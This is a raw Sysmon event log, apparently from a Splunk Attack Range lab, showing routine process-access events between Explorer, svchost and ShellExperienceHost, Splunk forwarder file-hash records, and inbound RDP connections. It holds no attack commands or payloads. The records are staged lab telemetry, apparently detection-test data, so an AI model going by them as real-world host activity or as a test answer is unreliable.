09:19:01.637{5EBD8912-79C0-6151-E577-00000000FC01}42967048C:\Windows\Explorer.EXE{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052081Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.617{5EBD8912-79BF-6151-DE77-00000000FC01}43084552C:\Windows\system32\taskhostw.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052080Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.617{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001052079Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:59.779{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53487-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052078Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.439{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41FEB34E6829F5BEF2097CD913A83DD5,SHA256=2B61B3ED5D1D2CC8EB4630AC9BD69DFCE5430470A753107B0C2DEE94A215544F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980290Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:58.435{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54367-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980289Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:57.707{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55995-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980288Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:01.179{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFCD30C3D6AF4FBCBBFB304CE0EE5BEC,SHA256=B309DCFB47243E0F7B32D5783EC06FBCC12BA224459B75CAE9EE598296C2F855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980287Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:01.179{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2F32F91D3DB1FDD906CC522EC4D5EF0,SHA256=1D986A55975A19877A62F40EEB4035C0CB934A35D67B444B3E84E818136B99C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052077Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.371{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=051F52E0FEE35E2A3DE4FBB86FFA9815,SHA256=E80A98A5E863E980CB61F3B6932CE5BD1DEADE4A9F22797C15369AC91F8FD111,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052076Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052075Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052074Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052073Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052072Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052071Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052070Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052069Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052068Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052067Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052066Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052065Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052064Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052063Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052062Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052061Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052060Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052059Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052058Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052057Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052056Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052055Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052054Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052053Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052052Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052051Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:01.255{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 